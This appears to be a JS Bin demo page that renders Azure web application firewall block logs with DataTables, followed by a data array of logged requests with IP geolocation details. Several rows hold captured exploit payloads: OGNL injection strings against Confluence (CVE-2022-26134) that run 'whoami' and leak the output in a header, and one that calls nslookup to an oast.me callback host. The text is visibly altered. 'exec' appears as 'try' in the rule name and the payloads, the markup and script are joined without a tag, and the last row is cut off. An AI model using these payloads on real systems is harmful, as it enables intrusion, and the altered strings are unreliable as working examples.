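<!doctype html>
<html lang="en">
<head>
  <!-- Charset comes first so the parser fixes the encoding before reading any other text. -->
  <meta charset="utf-8">
  <meta name="description" content="Select filter test">
  <title>DataTables - JS Bin</title>
  <!--
    Supply-chain note: these third-party assets are fetched without Subresource
    Integrity. The jQuery URL names a fixed release, so integrity and crossorigin
    attributes can be added once the hash of the vetted file has been computed;
    1.11.3 is an old release and should be checked against current jQuery
    security advisories. The DataTables "nightly" URLs are mutable builds that
    cannot be hash-pinned; a page that displays security logs should load a
    versioned, reviewed release instead.
  -->
  <link rel="stylesheet" href="https://nightly.datatables.net/css/jquery.dataTables.css">
  <!-- Loaded synchronously and in this order: DataTables needs jQuery to be defined first. -->
  <script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
  <script src="https://nightly.datatables.net/js/jquery.dataTables.js"></script>
</head>
<body>
  <div class="container">
    <!--
      Empty shell that the page's script fills with WAF block-log rows.
      Several row fields (request URL, matched variable value) are copied from
      blocked requests and are therefore attacker-controlled. DataTables writes
      cell data into the page as HTML by default, so the columns holding those
      fields should use a text renderer such as $.fn.dataTable.render.text(),
      or be HTML-escaped before display. The table initialisation is not part
      of this markup; confirm it there.
    -->
    <table class="display" id="azure-waf-block-table" width="100%">
    </table>
  </div>
</body>
</html>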
var data = [
[
"2022-10-18T16:28:00.5976688Z",
"ExampleWafPolicy",
"RG_NEW",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"Microsoft_DefaultRuleSet-1.1-SQLI-942330",
"Microsoft_DefaultRuleSet-1.1",
"SQLI",
"942330",
"Detects classic SQL injection probings 1/3",
"https://example.com:443/rest/api/2/jql/autocompletedata/suggestions?predicateName=FROM&predicateValue=%22&fieldName=status&_=1666110219644",
"2001:8a0:7254:2c00:b00f:9221:3a5e:9677",
{
"id": "138",
"created_date": "2022-10-20 11:36:46",
"last_updated": "2022-10-20 14:36:46",
"ipAddress": "2001:8a0:7254:2c00:b00f:9221:3a5e:9677",
"Malicious Score": "0",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "0",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "6",
"continent": "Europe",
"continentCode": "EU",
"country": "Portugal",
"countryCode": "PT",
"region": "15",
"regionName": "District of Setúbal",
"city": "Amora",
"district": "",
"zip": "2845-545",
"lat": "38.6306",
"lon": "-9.111",
"timezone": "Europe/Lisbon",
"offset": "3600",
"currency": "EUR",
"isp": "MEO - SERVICOS DE COMUNICACOES E MULTIMEDIA S.A",
"org": "PT Comunicacoes",
"asname": "MEO-RESIDENCIAL",
"ASN": "3243",
"reverse": "",
"domain": "telepac.pt",
"usageType": "Fixed Line ISP",
"reports": "0"
},
"[\r\n {\r\n "matchVariableName": "QueryParamValue:predicateValue",\r\n "matchVariableValue": "\\""\r\n }\r\n]",
"QueryParamValue:predicateValue",
""",
"QueryParamValue",
"Equals",
null,
"predicateValue",
"predicateValue",
"0ENROYwAAAACp5oTsoTjDQ5n+/rvTEzyxTFRTRURHRTEzMDgAMzVmOWI5NDYtOWUxYS00OTA1LWFlZTUtY2NmMTg0YTI5NmQ3"
],
[
"2022-10-18T16:24:48.6596467Z",
"ExampleWafPolicy",
"RG_NEW",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"Microsoft_DefaultRuleSet-1.1-SQLI-942330",
"Microsoft_DefaultRuleSet-1.1",
"SQLI",
"942330",
"Detects classic SQL injection probings 1/3",
"https://example.com:443/rest/api/2/jql/autocompletedata/suggestions?predicateName=TO&predicateValue=%22&fieldName=status&_=1666110219633",
"2001:8a0:7254:2c00:b00f:9221:3a5e:9677",
{
"id": "138",
"created_date": "2022-10-20 11:36:46",
"last_updated": "2022-10-20 14:36:46",
"ipAddress": "2001:8a0:7254:2c00:b00f:9221:3a5e:9677",
"Malicious Score": "0",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "0",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "6",
"continent": "Europe",
"continentCode": "EU",
"country": "Portugal",
"countryCode": "PT",
"region": "15",
"regionName": "District of Setúbal",
"city": "Amora",
"district": "",
"zip": "2845-545",
"lat": "38.6306",
"lon": "-9.111",
"timezone": "Europe/Lisbon",
"offset": "3600",
"currency": "EUR",
"isp": "MEO - SERVICOS DE COMUNICACOES E MULTIMEDIA S.A",
"org": "PT Comunicacoes",
"asname": "MEO-RESIDENCIAL",
"ASN": "3243",
"reverse": "",
"domain": "telepac.pt",
"usageType": "Fixed Line ISP",
"reports": "0"
},
"[\r\n {\r\n "matchVariableName": "QueryParamValue:predicateValue",\r\n "matchVariableValue": "\\""\r\n }\r\n]",
"QueryParamValue:predicateValue",
""",
"QueryParamValue",
"Equals",
null,
"predicateValue",
"predicateValue",
"0UNNOYwAAAAC2KjZp7vBDT4nYmb0R/eOhTFRTRURHRTEzMDgAMzVmOWI5NDYtOWUxYS00OTA1LWFlZTUtY2NmMTg0YTI5NmQ3"
],
[
"2022-10-18T16:25:40.8291236Z",
"ExampleWafPolicy",
"RG_NEW",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"Microsoft_DefaultRuleSet-1.1-SQLI-942330",
"Microsoft_DefaultRuleSet-1.1",
"SQLI",
"942330",
"Detects classic SQL injection probings 1/3",
"https://example.com:443/rest/api/2/jql/autocompletedata/suggestions?predicateName=FROM&predicateValue=%22&fieldName=status&_=1666110219640",
"2001:8a0:7254:2c00:b00f:9221:3a5e:9677",
{
"id": "138",
"created_date": "2022-10-20 11:36:46",
"last_updated": "2022-10-20 14:36:46",
"ipAddress": "2001:8a0:7254:2c00:b00f:9221:3a5e:9677",
"Malicious Score": "0",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "0",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "6",
"continent": "Europe",
"continentCode": "EU",
"country": "Portugal",
"countryCode": "PT",
"region": "15",
"regionName": "District of Setúbal",
"city": "Amora",
"district": "",
"zip": "2845-545",
"lat": "38.6306",
"lon": "-9.111",
"timezone": "Europe/Lisbon",
"offset": "3600",
"currency": "EUR",
"isp": "MEO - SERVICOS DE COMUNICACOES E MULTIMEDIA S.A",
"org": "PT Comunicacoes",
"asname": "MEO-RESIDENCIAL",
"ASN": "3243",
"reverse": "",
"domain": "telepac.pt",
"usageType": "Fixed Line ISP",
"reports": "0"
},
"[\r\n {\r\n "matchVariableName": "QueryParamValue:predicateValue",\r\n "matchVariableValue": "\\""\r\n }\r\n]",
"QueryParamValue:predicateValue",
""",
"QueryParamValue",
"Equals",
null,
"predicateValue",
"predicateValue",
"0hNNOYwAAAAAjRbl/IboyQpGiUQYTIEjeTFRTRURHRTEzMDgAMzVmOWI5NDYtOWUxYS00OTA1LWFlZTUtY2NmMTg0YTI5NmQ3"
],
[
"2022-10-17T13:16:21.3691789Z",
"ExampleWafPolicy",
"RG_NEW",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"Microsoft_DefaultRuleSet-1.1-SQLI-942350",
"Microsoft_DefaultRuleSet-1.1",
"SQLI",
"942350",
"Detects MySQL UDF injection and other data/structure manipulation attempts",
"https://example.com:443/secure/RapidBoard.jspa?rapidView=292&amp;view=detail&amp;selectedIssue=MKT-147&amp;quickFilter=940",
"52.114.75.216",
{
"id": "10",
"created_date": "2022-08-18 11:16:37",
"last_updated": "2022-09-30 16:58:26",
"ipAddress": "52.114.75.216",
"Malicious Score": "45",
"is_crawler": "0",
"mobile": "0",
"hosting": "1",
"proxy": "1",
"vpn": "1",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "1",
"bot_status": "1",
"isPublic": "1",
"ipVersion": "4",
"continent": "Europe",
"continentCode": "EU",
"country": "Netherlands",
"countryCode": "NL",
"region": "NH",
"regionName": "North Holland",
"city": "Amsterdam",
"district": "",
"zip": "1047",
"lat": "52.3667",
"lon": "4.9",
"timezone": "Europe/Amsterdam",
"offset": "7200",
"currency": "EUR",
"isp": "Microsoft Corporation",
"org": "Microsoft Azure Cloud (westeurope)",
"asname": "MICROSOFT-CORP-MSN-AS-BLOCK",
"ASN": "8075",
"reverse": "",
"domain": "microsoft.com",
"usageType": "Data Center/Web Hosting/Transit",
"reports": "0"
},
"[\r\n {\r\n "matchVariableName": "QueryParamName",\r\n "matchVariableValue": "amp;selectedIssue"\r\n }\r\n]",
"QueryParamName",
"amp;selectedIssue",
"QueryParamName",
"Equals",
null,
"predicateValue",
"predicateValue",
"0pVVNYwAAAAAdw6PPacH4SpaFxq3EBVL+UEFSMjAxMDMxMDE0MDI1ADM1ZjliOTQ2LTllMWEtNDkwNS1hZWU1LWNjZjE4NGEyOTZkNw=="
],
[
"2022-10-19T15:00:05.3320972Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"Microsoft_DefaultRuleSet-1.1-MS-ThreatIntel-SQLI-99031002",
"Microsoft_DefaultRuleSet-1.1",
"MS-ThreatIntel-SQLI",
"99031002",
"SQL Comment Sequence Detected.",
"https://api.example.com:443/pages/docreatepage.action",
"94.60.196.168",
{
"id": "145",
"created_date": "2022-10-20 11:37:13",
"last_updated": "2022-10-20 14:37:13",
"ipAddress": "94.60.196.168",
"Malicious Score": "0",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "0",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "4",
"continent": "Europe",
"continentCode": "EU",
"country": "Portugal",
"countryCode": "PT",
"region": "13",
"regionName": "Porto",
"city": "Porto",
"district": "",
"zip": "4000-000",
"lat": "41.1691",
"lon": "-8.6793",
"timezone": "Europe/Lisbon",
"offset": "3600",
"currency": "EUR",
"isp": "Vodafone Portugal",
"org": "Vodafone Telecel, Comunicacoes Pessoais, SA",
"asname": "VODAFONE-PT",
"ASN": "12353",
"reverse": "168.196.60.94.rev.vodafone.pt",
"domain": "vodafone.pt",
"usageType": "",
"reports": "0"
},
"[\r\n {\r\n "matchVariableName": "PostParamValue:parentPageString",\r\n "matchVariableValue": "UWCL Finals - 21/22 -- 20/12/2021"\r\n }\r\n]",
"PostParamValue:parentPageString",
"UWCL Finals - 21/22 -- 20/12/2021",
"PostParamValue",
"Equals",
null,
"parentPageString",
"parentPageString",
"09RBQYwAAAACoPBvUpx4SS541IptMRYbtQlJVMzBFREdFMDQxMABlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM="
],
[
"2022-10-19T13:17:29.734758Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"Microsoft_DefaultRuleSet-1.1-PROTOCOL-ATTACK-921151",
"Microsoft_DefaultRuleSet-1.1",
"PROTOCOL-ATTACK",
"921151",
"HTTP Header Injection Attack via payload (CR/LF detected)",
"https://api.example.com:443/rest/api/search?cql=user+~+%22Has+the+Budget+been+estimated+for+the+project%5C%3F%0A%0A%0A%0AHas+the+budget+been+approved+for+project%5C%3F%0A%0A%0A%0A%0AWhat+is+the+one+time+and+recurring+costs%5C%3F%0A%0A%0A%0A%0AHave+Resources+been+estimated+%2F+secured%5C%3F%22&start=0&limit=100&_=1666184780361",
"46.140.144.11",
{
"id": "25",
"created_date": "2022-08-18 14:43:51",
"last_updated": "2022-10-21 12:35:21",
"ipAddress": "46.140.144.11",
"Malicious Score": "0",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "1",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "1",
"bot_status": "1",
"isPublic": "1",
"ipVersion": "4",
"continent": "Europe",
"continentCode": "EU",
"country": "Switzerland",
"countryCode": "CH",
"region": "ZH",
"regionName": "Zurich",
"city": "Opfikon",
"district": "",
"zip": "8152",
"lat": "47.4217",
"lon": "8.55569",
"timezone": "Europe/Zurich",
"offset": "7200",
"currency": "CHF",
"isp": "UPC Schweiz GmbH",
"org": "Sunrise UPC GmbH",
"asname": "LibertyGlobal",
"ASN": "6830",
"reverse": "46-140-144-11.static.cablecom.ch",
"domain": "hispeed.ch",
"usageType": "",
"reports": "0"
},
"[\r\n {\r\n "matchVariableName": "QueryParamValue:cql",\r\n "matchVariableValue": "user ~ \\"Has the Budget been estimated for the project\\\\?\\n\\n\\n\\nHas the budget been approved for project\\\\?\\n\\n\\n\\n\\nWhat is the one time and recurring costs\\\\?\\n\\n\\n\\n\\nHave Resources been estimated / secured\\\\?\\""\r\n }\r\n]",
"QueryParamValue:cql",
"user ~ "Has the Budget been estimated for the project\\?\n\n\n\nHas the budget been approved for project\\?\n\n\n\n\nWhat is the one time and recurring costs\\?\n\n\n\n\nHave Resources been estimated / secured\\?"",
"QueryParamValue",
"Equals",
null,
"cql",
"cql",
"06fhPYwAAAADf9xmFU2iCSb9Qxiyks2JbWlJIRURHRTA2MTcAZWRmMWI0NDctOGFiZi00OTlmLWI4Y2MtMTZhOTczNzZiMGEz"
],
[
"2022-10-19T13:17:30.2529096Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"Microsoft_DefaultRuleSet-1.1-PROTOCOL-ATTACK-921151",
"Microsoft_DefaultRuleSet-1.1",
"PROTOCOL-ATTACK",
"921151",
"HTTP Header Injection Attack via payload (CR/LF detected)",
"https://api.example.com:443/rest/api/search?cql=user+~+%22Has+the+Budget+been+estimated+for+the+project%5C%3F%0A%0A%0A%0AHas+the+budget+been+approved+for+project%5C%3F%0A%0A%0A%0A%0AWhat+is+the+one+time+and+recurring+costs%5C%3F%0A%0A%0A%0A%0AHave+Resources+been+estimated+%2F+secured%5C%3Fk%22&start=0&limit=100&_=1666184780362",
"46.140.144.11",
{
"id": "25",
"created_date": "2022-08-18 14:43:51",
"last_updated": "2022-10-21 12:35:21",
"ipAddress": "46.140.144.11",
"Malicious Score": "0",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "1",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "1",
"bot_status": "1",
"isPublic": "1",
"ipVersion": "4",
"continent": "Europe",
"continentCode": "EU",
"country": "Switzerland",
"countryCode": "CH",
"region": "ZH",
"regionName": "Zurich",
"city": "Opfikon",
"district": "",
"zip": "8152",
"lat": "47.4217",
"lon": "8.55569",
"timezone": "Europe/Zurich",
"offset": "7200",
"currency": "CHF",
"isp": "UPC Schweiz GmbH",
"org": "Sunrise UPC GmbH",
"asname": "LibertyGlobal",
"ASN": "6830",
"reverse": "46-140-144-11.static.cablecom.ch",
"domain": "hispeed.ch",
"usageType": "",
"reports": "0"
},
"[\r\n {\r\n "matchVariableName": "QueryParamValue:cql",\r\n "matchVariableValue": "user ~ \\"Has the Budget been estimated for the project\\\\?\\n\\n\\n\\nHas the budget been approved for project\\\\?\\n\\n\\n\\n\\nWhat is the one time and recurring costs\\\\?\\n\\n\\n\\n\\nHave Resources been estimated / secured\\\\?k\\""\r\n }\r\n]",
"QueryParamValue:cql",
"user ~ "Has the Budget been estimated for the project\\?\n\n\n\nHas the budget been approved for project\\?\n\n\n\n\nWhat is the one time and recurring costs\\?\n\n\n\n\nHave Resources been estimated / secured\\?k"",
"QueryParamValue",
"Equals",
null,
"cql",
"cql",
"06vhPYwAAAADPsK4zzms8S4Aph7io0JqkWlJIRURHRTA2MTcAZWRmMWI0NDctOGFiZi00OTlmLWI4Y2MtMTZhOTczNzZiMGEz"
],
[
"2022-10-14T13:59:21.6189951Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"DenyList",
null,
null,
null,
"",
"https://api.example.com:443/",
"1.209.47.241",
{
"id": "6",
"created_date": "2022-08-18 11:16:28",
"last_updated": "2022-10-20 11:04:15",
"ipAddress": "1.209.47.241",
"Malicious Score": "21",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "1",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "4",
"continent": "Asia",
"continentCode": "AS",
"country": "South Korea",
"countryCode": "KR",
"region": "41",
"regionName": "Gyeonggi-do",
"city": "Anyang-si",
"district": "Deokcheon-ro",
"zip": "14088",
"lat": "37.3884",
"lon": "126.936",
"timezone": "Asia/Seoul",
"offset": "32400",
"currency": "KRW",
"isp": "LG DACOM Corporation",
"org": "LG Uplus",
"asname": "LGDACOM",
"ASN": "3786",
"reverse": "",
"domain": "uplus.co.kr",
"usageType": "",
"reports": "7"
},
"[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]",
"ClientIP",
"1.209.47.241",
null,
"Equals",
null,
"Already blocked by IP",
null,
"0OWtJYwAAAABePH3TR7EXTYBbFT92CzFOU0VMMjFFREdFMDIwOABlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM="
],
[
"2022-10-14T13:59:21.60786Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"DenyList",
null,
null,
null,
"",
"https://api.example.com:443/",
"1.209.47.241",
{
"id": "6",
"created_date": "2022-08-18 11:16:28",
"last_updated": "2022-10-20 11:04:15",
"ipAddress": "1.209.47.241",
"Malicious Score": "21",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "1",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "4",
"continent": "Asia",
"continentCode": "AS",
"country": "South Korea",
"countryCode": "KR",
"region": "41",
"regionName": "Gyeonggi-do",
"city": "Anyang-si",
"district": "Deokcheon-ro",
"zip": "14088",
"lat": "37.3884",
"lon": "126.936",
"timezone": "Asia/Seoul",
"offset": "32400",
"currency": "KRW",
"isp": "LG DACOM Corporation",
"org": "LG Uplus",
"asname": "LGDACOM",
"ASN": "3786",
"reverse": "",
"domain": "uplus.co.kr",
"usageType": "",
"reports": "7"
},
"[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]",
"ClientIP",
"1.209.47.241",
null,
"Equals",
null,
"Already blocked by IP",
null,
"0OWtJYwAAAABs0zbbTE0ZTo6drCSdhZG2U0VMMjFFREdFMDIxMQBlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM="
],
[
"2022-10-14T14:00:04.2776607Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"DenyList",
null,
null,
null,
"",
"https://api.example.com:443/",
"1.209.47.241",
{
"id": "6",
"created_date": "2022-08-18 11:16:28",
"last_updated": "2022-10-20 11:04:15",
"ipAddress": "1.209.47.241",
"Malicious Score": "21",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "1",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "4",
"continent": "Asia",
"continentCode": "AS",
"country": "South Korea",
"countryCode": "KR",
"region": "41",
"regionName": "Gyeonggi-do",
"city": "Anyang-si",
"district": "Deokcheon-ro",
"zip": "14088",
"lat": "37.3884",
"lon": "126.936",
"timezone": "Asia/Seoul",
"offset": "32400",
"currency": "KRW",
"isp": "LG DACOM Corporation",
"org": "LG Uplus",
"asname": "LGDACOM",
"ASN": "3786",
"reverse": "",
"domain": "uplus.co.kr",
"usageType": "",
"reports": "7"
},
"[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]",
"ClientIP",
"1.209.47.241",
null,
"Equals",
null,
"Already blocked by IP",
null,
"0ZGtJYwAAAAAmeiJy5utDQKkghIWyxxthU0VMMjFFREdFMDIwNgBlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM="
],
[
"2022-10-15T13:12:54.3205549Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"Microsoft_DefaultRuleSet-1.1-RCE-932130",
"Microsoft_DefaultRuleSet-1.1",
"RCE",
"932130",
"Remote Command tryution: Unix Shell Expression or Confluence Vulnerability (CVE-2022-26134) Found",
"https://api.example.com:443/",
"104.251.238.50",
{
"id": "139",
"created_date": "2022-10-20 11:36:49",
"last_updated": "2022-10-20 14:36:49",
"ipAddress": "104.251.238.50",
"Malicious Score": "23",
"is_crawler": "0",
"mobile": "0",
"hosting": "1",
"proxy": "1",
"vpn": "1",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "4",
"continent": "North America",
"continentCode": "NA",
"country": "United States",
"countryCode": "US",
"region": "CA",
"regionName": "California",
"city": "Los Angeles",
"district": "",
"zip": "90009",
"lat": "34.0522",
"lon": "-118.244",
"timezone": "America/Los_Angeles",
"offset": "-25200",
"currency": "USD",
"isp": "Zenlayer Inc",
"org": "Klayer LLC",
"asname": "ZEN-ECN",
"ASN": "21859",
"reverse": "104.251.238.50.static.klayer.com",
"domain": "klayer.com",
"usageType": "Data Center/Web Hosting/Transit",
"reports": "0"
},
"[\r\n {\r\n "matchVariableName": "DecodedPath",\r\n "matchVariableValue": "${@java.lang.Runtime@getRuntime().try(\\"nslookup cd596q505o11a119sf80dj1wxxs43mbbn.oast.me\\")}/"\r\n }\r\n]",
"DecodedPath",
"${@java.lang.Runtime@getRuntime().try("nslookup cd596q505o11a119sf80dj1wxxs43mbbn.oast.me")}/",
"DecodedPath",
"Equals",
"java.lang.Runtime",
"Very likely malicious",
null,
"01rFKYwAAAADqUAxzKjYtQojWLsyE+yp9TEFYMzExMDAwMTA4MDQ3AGVkZjFiNDQ3LThhYmYtNDk5Zi1iOGNjLTE2YTk3Mzc2YjBhMw=="
],
[
"2022-10-15T13:12:54.2857897Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"Microsoft_DefaultRuleSet-1.1-RCE-932130",
"Microsoft_DefaultRuleSet-1.1",
"RCE",
"932130",
"Remote Command tryution: Unix Shell Expression or Confluence Vulnerability (CVE-2022-26134) Found",
"https://api.example.com:443/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().try("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/",
"104.251.238.50",
{
"id": "139",
"created_date": "2022-10-20 11:36:49",
"last_updated": "2022-10-20 14:36:49",
"ipAddress": "104.251.238.50",
"Malicious Score": "23",
"is_crawler": "0",
"mobile": "0",
"hosting": "1",
"proxy": "1",
"vpn": "1",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "4",
"continent": "North America",
"continentCode": "NA",
"country": "United States",
"countryCode": "US",
"region": "CA",
"regionName": "California",
"city": "Los Angeles",
"district": "",
"zip": "90009",
"lat": "34.0522",
"lon": "-118.244",
"timezone": "America/Los_Angeles",
"offset": "-25200",
"currency": "USD",
"isp": "Zenlayer Inc",
"org": "Klayer LLC",
"asname": "ZEN-ECN",
"ASN": "21859",
"reverse": "104.251.238.50.static.klayer.com",
"domain": "klayer.com",
"usageType": "Data Center/Web Hosting/Transit",
"reports": "0"
},
"[\r\n {\r\n "matchVariableName": "DecodedPath",\r\n "matchVariableValue": "${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().try(\\"whoami\\").getInputStream(),\\"utf-8\\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\\"X-Cmd-Response\\",#a))}/"\r\n }\r\n]",
"DecodedPath",
"${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().try("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/",
"DecodedPath",
"Equals",
"java.lang.Runtime",
"Very likely malicious",
null,
"01rFKYwAAAAAyThJuCwwQS6b3tJi2uoPMTEFYMzExMDAwMTA4MDIzAGVkZjFiNDQ3LThhYmYtNDk5Zi1iOGNjLTE2YTk3Mzc2YjBhMw=="
],
[
"2022-10-14T14:36:00.1574471Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"DenyList",
null,
null,
null,
"",
"https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x",
"1.209.47.241",
{
"id": "6",
"created_date": "2022-08-18 11:16:28",
"last_updated": "2022-10-20 11:04:15",
"ipAddress": "1.209.47.241",
"Malicious Score": "21",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "1",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "4",
"continent": "Asia",
"continentCode": "AS",
"country": "South Korea",
"countryCode": "KR",
"region": "41",
"regionName": "Gyeonggi-do",
"city": "Anyang-si",
"district": "Deokcheon-ro",
"zip": "14088",
"lat": "37.3884",
"lon": "126.936",
"timezone": "Asia/Seoul",
"offset": "32400",
"currency": "KRW",
"isp": "LG DACOM Corporation",
"org": "LG Uplus",
"asname": "LGDACOM",
"ASN": "3786",
"reverse": "",
"domain": "uplus.co.kr",
"usageType": "",
"reports": "7"
},
"[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]",
"ClientIP",
"1.209.47.241",
null,
"Equals",
null,
"Already blocked by IP",
null,
"00HNJYwAAAAC4I8s8BM+WQJT5PY88psw2U0VMMjFFREdFMDExNQBlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM="
],
[
"2022-10-14T14:36:00.1527312Z",
"ExampleWafPolicyApi",
"RG_OLD",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"DenyList",
null,
null,
null,
"",
"https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x",
"1.209.47.241",
{
"id": "6",
"created_date": "2022-08-18 11:16:28",
"last_updated": "2022-10-20 11:04:15",
"ipAddress": "1.209.47.241",
"Malicious Score": "21",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "1",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "4",
"continent": "Asia",
"continentCode": "AS",
"country": "South Korea",
"countryCode": "KR",
"region": "41",
"regionName": "Gyeonggi-do",
"city": "Anyang-si",
"district": "Deokcheon-ro",
"zip": "14088",
"lat": "37.3884",
"lon": "126.936",
"timezone": "Asia/Seoul",
"offset": "32400",
"currency": "KRW",
"isp": "LG DACOM Corporation",
"org": "LG Uplus",
"asname": "LGDACOM",
"ASN": "3786",
"reverse": "",
"domain": "uplus.co.kr",
"usageType": "",
"reports": "7"
},
"[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]",
"ClientIP",
"1.209.47.241",
null,
"Equals",
null,
"Already blocked by IP",
null,
"00HNJYwAAAABzhQVKlYE7Q4SM9bt5uFhHU0VMMjFFREdFMDExMQBlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM="
],
[
"2022-10-18T16:24:48.6596467Z",
"ExampleWafPolicy",
"RG_NEW",
"ad8e955d-247e-40d8-ae15-d97d805626e6",
"Microsoft_DefaultRuleSet-1.1-SQLI-942330",
"Microsoft_DefaultRuleSet-1.1",
"SQLI",
"942330",
"Detects classic SQL injection probings 1/3",
"https://example.com:443/rest/api/2/jql/autocompletedata/suggestions?predicateName=TO&predicateValue=%22&fieldName=status&_=1666110219633",
"2001:8a0:7254:2c00:b00f:9221:3a5e:9677",
{
"id": "138",
"created_date": "2022-10-20 11:36:46",
"last_updated": "2022-10-20 14:36:46",
"ipAddress": "2001:8a0:7254:2c00:b00f:9221:3a5e:9677",
"Malicious Score": "0",
"is_crawler": "0",
"mobile": "0",
"hosting": "0",
"proxy": "0",
"vpn": "0",
"tor": "0",
"active_vpn": "0",
"active_tor": "0",
"recent_abuse": "0",
"bot_status": "0",
"isPublic": "1",
"ipVersion": "6",
"continent": "Europe",
"continentCode": "EU",
"country": "Portugal",
"countryCode": "PT",
"region": "15",
"regionName": "District of Setúbal",
"city": "Amora",
"district": "",
"zip": "2845-545",
"lat": "38.6306",
"lon": "-9.111",
"timezone": "Europe/Lisbon",
"offset": "3600",
"currency": "EUR",
"isp": "MEO - SERVICOS DE COMUNICACOES E MULTIMEDIA S.A",
"org": "PT Comunicacoes",
"asname": "MEO-RESIDENCIAL",
"ASN": "3243",
"reverse": "",
"domain": "telepac.pt",
"usageType": "Fixed Line ISP",
"reports": "0"
},
"[\r\n {\r\n "matchVariableName": "QueryParamValue:predicateValue",\r\n "matchVariableValue": "\\""\r\n }\r\n]",
"QueryParamValue:predicateValue",
""",
"QueryParamValue",
"Equals",
null,
"predicateValue",
"predicateValue",
